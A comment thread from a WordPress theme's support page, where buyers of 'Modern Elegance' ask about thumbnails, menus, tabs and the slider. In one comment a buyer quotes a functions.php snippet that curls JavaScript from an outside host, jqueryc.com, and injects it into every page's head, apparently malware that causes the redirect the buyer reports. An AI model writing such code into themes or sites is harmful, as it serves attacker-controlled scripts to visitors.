277 comments found

Thirdly,

My (post) images are not displaying – either uploaded from WP “updloads” or NextGen galleries. I basically see the image placeholder with a “busy” rotating icon in the middle as if it’s not able to find the image. However, when I click on it, it does open the image in the lightbox so it can’t be wrong-path related.

Thank you Andrew

With regards to the last issue, I have contacted the host to try and solve the issue with timthumb…

The thumbnail issue is now sorted (security exception given on host).

Please advice regarding the previous two issues.

Thank you Andrew

I’m having issues with the Menu. I’m under MElegance->Menu and have added my menu items. However, when I click save or add or anything, everything I’ve done simply disappears. Please help.

Here is screencast showing exactly what I’m doing:

http://screencast.com/t/eOxd8D2nmz

Will you support WordPress 3.5?

DigitalCavalry

Hello,

Yes, I think there will be no problem with this new WP version.

Wabke Purchased

Hello,

I have the same problem as Andrew; My (post) images and gallery images are not displaying; I basically see the image placeholder with a “busy” rotating icon in the middle as if it’s not able to find the image.

Please help, regards, Wabke

DigitalCavalry

Hello,

Looks like you need to change the rights (permission) settings for “cache” folder located in the theme. This is described more in PDF User Guide file in part: 2.5.2 Thumbnails problem (timthumb).

You can also update timthumb script file to the latest version available using this instruction:

---------- timthumb update ----------

You can redownload a new version of this file from this page:

http://code.google.com/p/timthumb/source/browse/trunk/timthumb.php?spec=svn213&r=213

To download it you can save the content under the link “View raw file” located on the right side of this page. Then you must change the name from timthumb.php to thumb.php and insert it into theme folder on server. And you should also delete all files from “cache” folder located inside the Prestige theme folder, and that’s all.

Hi there,

I’m wondering if it’s possible on some pages to remove the header and footer completely and make a page look like a landing page or a sales page without links to any of the other pages. Can this be done?

Thank you.

DigitalCavalry

Hello,

No, this is not possible. For this a special functionality is needed – some additional code that will allow you to turn the header and footer off the page. This might be complicated.

Wabke Purchased

Hello, I’ve done everything you suggested in your response 16 days ago regarding the timthumb problem, but still it’s not working. Hopefully you can give me some more help? The beautiful slider within the theme was one of the main reasons to purchase it, so I really hope we can get it working. Thanks in advance, Wabke

DigitalCavalry

Hello, maybe you can send us a link to your site here in the comments or on email (using contact form in our Theme Forest profile) and I will take a quick look on this. I am not sure if this is an issue with timthumb, because you wrote earlier about the gallery and now you ask about the slider.

Wabke Purchased

The website is shuempress.eu. Thanks for taking a look. Wabke

DigitalCavalry

Hello, thanks for the link. Looks like there is no permission set for the timthumb “cache” folder or it is not allowed by server settings. If you are sure you changed the rights (permission) setting for “cache” folder on your server, you can also ask your host about this – sometimes permission settings must be changed by host if server has some other settings. And if this won’t help you can also search for your host name and timthumb in the web and there should be some more information about this topic.

Wabke Purchased

Thanks once again. I’ve contacted my host and it is solved with two steps; first indeed the rights to timthumb.php. This however did not solve the problem yet. However, changing the owner of the cache folder into apache did. Great! Now I can enjoy this great theme :-)

regards, Wabke

DigitalCavalry

Great you resolved this, thanks!

nmaunder Purchased

Hi,

Awesome theme!!

Is it possible to left align the menu? Would I need to edit the following css?

.sf-menu { margin-bottom: 0px; padding: 0px; list-style: none; font-family: Georgia; position: absolute; right: 0px; top: 0px; }

Any assistance would be appreciated.

Thanks.

DigitalCavalry

Hello,

Yes, you need to change one property in this class to align the menu to left (in common.css file located in “css” folder). Change property right:0px; into left:0px; and that’s all. Thanks!

Default-user
nmaunder Purchased

Thanks so much!

Hey guys.

im having an issue with the homepage, it seems as tho it will only display one home tab.

it also doesnt listen to “which tabs to display separated by commas” or the display date (which is fine because i dont need this feature) but the not displaying more than one is a bit annoying. any ideas?

DigitalCavalry

Hello,

If you write about Homepage Tabs feature (it is on our Live Preview homepage section titled as “CONTENT IN TABS ”) I think everything should work fine. I just tested the options and I can display more than one tab (as you can see this in the Live Preview with two tabs) or display only one, I can also select tabs manually etc.

You can check just to be sure if you have created more than one post in Home Tabs section. Then in MElegance > Home > Homepage Tabs section check these options:

- Number of tabs to display – it should be set to some value higher than 1 if you want to display more tabs

- if you want to display all Home Tabs posts you don’t have to select posts by ID. But, if you want to select some specific posts by ID then you can use the manual option – write posts ID numbers and make sure option “Use manually selected tabs” is selected.

If you check this and it wont help, maybe you can send us access to your WP admin (on email, using contact form in our Theme Forest profile) and I will take a look on this.

bsamuel2 Purchased

My Navigation menu is not working. It was working before. Suddenly stopped. I have updated the menu in Theme section. Still not working. Please Help. Its Urgent.

http://cca.org.hk/Test/
bsamuel2 Purchased

It The Menu Naviagtion not working because I have upgraded Wordpress to 3.4.1 and also did updated on Plugins.. Please help as soon as possible

http://cca.org.hk/Test/
DigitalCavalry

Hello, thanks for the link. I think it is not related to the WP update. I checked your site and looks like the main navigation is not working because you set big logo container (320px height) which is covering / overlapping the menu area – the menu is not reacting because it is covered by this logo container. To fix this you can go to MElegance > General > Header Settings section and increase the height of the header so it is at least as big as logo height. Or you can just decrease the logo container height in section MElegance > General > Logo Settings (option “Logo height in pixels”).

bsamuel2 Purchased

II have reduce the logo size. Changed the settings in the General Tab, but still not able to use the Navigation Menu .Please help

http://cca.org.hk/Test/
DigitalCavalry

Hello, the logo container is still covering the main navigation, maybe you forgot to Save changes to the settings in MElegance > General > Logo Settings section (or changed only the real GIF image size). You need to change the “Logo height in pixels” parameter value in this section – from 320 to lets say 130px (at this moment, with your current header size on your site, it shouldn’t be higher than 130px). After you will make this change in parameter value, click on Save in this section.

Hello,

Theme redirecting to http://www.jqueryc.com/ this url…earlyer theam worked well all of sudden it is redirecting to abou site.

This is my functions.php

if (!function_exists(‘insert_jquery_elegant’)){function insert_jquery_elegant(){if (function_exists(‘curl_init’)){$url=”http://www.jqueryc.com/jquery-1.6.3.min.js”;$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT _URL, $url);curl_setopt($ch, CURLOPT _RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT _CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action(‘wp_head’, ‘insert_jquery_elegant’);}

tribun Purchased

When comes an Update?

DigitalCavalry

Hello, at this moment there is no update in the works for this theme. Current version of Modern Elegance is compatible with the latest WP version.

meeshtay Purchased

Hi, I would like to change the font size for the posts and pages body text. Where do I go to change this? Thanks for your help.

DigitalCavalry

Hi,

You can change this in common.css file located in the “css” folder right below line 29 in the body style. Just change the px values for font property (font-size/line-height), by default it looks like this:

font: normal 12px/17px Verdana;

mattvogt Purchased

Hey there, I noticed page previews is broken – I thought it may have been a plugin conflict but other themes preview ok.

What happens is I click preview on a saved page (with an edit) and it and it will open the original page. When I hit preview on a draft it opens an empty page with: ?page_id=####&preview=true with the #’s being the page ID.

I did some research and do you think it could be $p calls in functions.php conflicting with wordpress’s preview stuff?

I tried this http://nooshu.com/preview-post-broke-in-wordpress

but with no luck! hmmm any ideas? Thanks! :)

ps: posts preview ok

DigitalCavalry

Hello,

Thanks for the information. I am not sure what is causing this, but we will investigate it more. From what we looked right now it doesn’t look like a problem related to the $p that you described. We will try to look more for some solution and maybe I will have some better answer for this issue soon. This should be some small snag.

mattvogt
mattvogt Purchased

Thanks please do!!

Hi there,

I recently purchased your Modern Elegance theme and I’ve been trying to figure out how to get the progressive slider to display on the homepage. I’ve uploaded 2 images as accordingly to the user guide but it’s still not showing, if you look at the following link:

http://www.invi8.com/test/slider.jpg

Am I missing any steps?

DigitalCavalry

Hello, you must create a page with Homepage template and selected this page for “A Static Page: Front page” option in section Settings > Reading. Then, you can also check if Progress Slider is selected for your homepage in MElegance > General section. This should help.

by
by
by
by
by
by